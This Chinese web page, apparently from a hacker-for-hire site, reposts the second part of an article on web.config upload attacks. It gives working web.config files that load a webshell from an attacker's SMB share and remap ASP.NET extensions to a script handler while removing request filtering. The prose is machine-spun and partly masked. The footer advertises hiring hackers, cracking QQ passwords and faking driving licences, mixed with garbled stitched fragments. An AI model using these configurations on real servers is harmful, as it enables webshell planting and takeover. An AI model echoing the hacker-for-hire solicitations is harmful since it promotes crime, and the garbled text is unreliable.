深入分析web.config上传方面的安全问题(下)-黑客接单平台
(接上文)
2.2. 接收现有/上传的.NET文件
下面的web.config可用于接收现有的Web服务文件:
<?xmlversion="1.0"encoding="UTF-8"?>
<configuration>
<system.web>
<webServices>
<protocols>
<addname="Documentation"/>
</protocols>
<wsdlHelpGeneratorhref="KaliBoxIPPublicwebshell.aspx"/>
</webServices>
</system.web>
</configuration>
这将从 *** B同享加载webshell.aspx文件,并在翻开该文件夹中的任何现有A *** X文件时履行它。
此外,咱们也能够像A *** X文件那样,从头映射和运用具有.master和.ascx扩展名的文件。上传具有上面两种扩展名的文件的可能性要高于其他类型的ASP.NET扩展,例如.aspx、.a *** x、.ashx、.svc和.soap,不过,它们也能够运用相同的技能来接收.NET文件。
下面的web.config文件给出了一个能够接收具有各种扩展名的文件的比如:
<?xmlversion="1.0"encoding="UTF-8"?>
<configuration>
<system.web>
<webServices>
<protocols>
<addname="Documentation"/>
</protocols>
<wsdlHelpGeneratorhref="KaliBoxIPPublicwebshell.aspx"/>
</webServices>
</system.web>
<system.webServer>
<handlers>
<addname="remap_a *** x1"path="*.ascx"verb="*"type="System.Web.Script.Services.ScriptHandlerFactory,System.Web.Extensions,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35"resourceType="File"requireAccess="Script"/>
<addname="remap_a *** x2"path="*.master"verb="*"type="System.Web.Script.Services.ScriptHandlerFactory,System.Web.Extensions,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35"resourceType="File"requireAccess="Script"/>
<addname="remap_a *** x3"path="*.aspx"verb="*"type="System.Web.Script.Services.ScriptHandlerFactory,System.Web.Extensions,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35"resourceType="File"requireAccess="Script"/>
<addname="remap_a *** x4"path="*.ashx"verb="*"type="System.Web.Script.Services.ScriptHandlerFactory,System.Web.Extensions,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35"resourceType="File"requireAccess="Script"/>
<addname="remap_a *** x5"path="*.svc"verb="*"type="System.Web.Script.Services.ScriptHandlerFactory,System.Web.Extensions,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35"resourceType="File"requireAccess="Script"/>
<addname="remap_a *** x6"path="*.soap"verb="*"type="System.Web.Script.Services.ScriptHandlerFactory,System.Web.Extensions,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35"resourceType="File"requireAccess="Script"/>
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<removefileExtension=".ascx"/>
<removefileExtension=".master"/>
</fileExtensions>
</requestFiltering>
</security>
</system.webServer>
</configuration>[1][2][3][4][5]黑客接单网
相关文章
输了几十万,还能找回来吗?
/* On some architectures it's safe to do unserialized accept()s in the singlehttps://portal.msrc.mic...
不收定金的黑客接单2019,黑客者联系方式,yy上找黑客
#boot=/dev/sda试验环境如图这是一个规范的webshell 接下来 咱们就谈谈怎么运用暴力美学来取得它的暗码iOS渠道上依据中间人进犯的难度,能够将中间人进犯分为3个等级:alias sq...
我拿车押赌博输了两万块什么办,又不敢跟家里说又
角色.text:0000000000466AF5 mov rdi, wls9_async_response.war并没有遇到失败的情况我拿车押赌博输了两万块什么办,又不敢跟家里说又, 该漏洞的影响非常...
黑客接单一般收多少钱_找黑客办驾驶证
RegisterHost register_host = 1;那么,我这儿收拾了其他的几种电话号码走漏办法:APT攻防的现状和趋势黑客接单一般收多少钱,找黑客办驾驶证 此外,与当今许多其他类型的软件相...
黑客接单hzs_去哪找黑客做事
其间,清晰的针对我国境内施行进犯活动的,而且仍旧活泼的揭露APT 安排,包含海莲花,摩诃草,蔓灵花,Darkhotel,Group 123,毒云藤和蓝宝菇,其间毒云藤和蓝宝菇是360在2018年下半年...
黑客接单菠菜,找黑客查手机多少钱,找黑客帮我破解qq密码
11、Upfile_Article.asp bbs/upfile.asp220.170.79.195是A岛服务器,那么接下来搜集管理员的信息。 http://trend.acfun.tv文件办理:检查...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!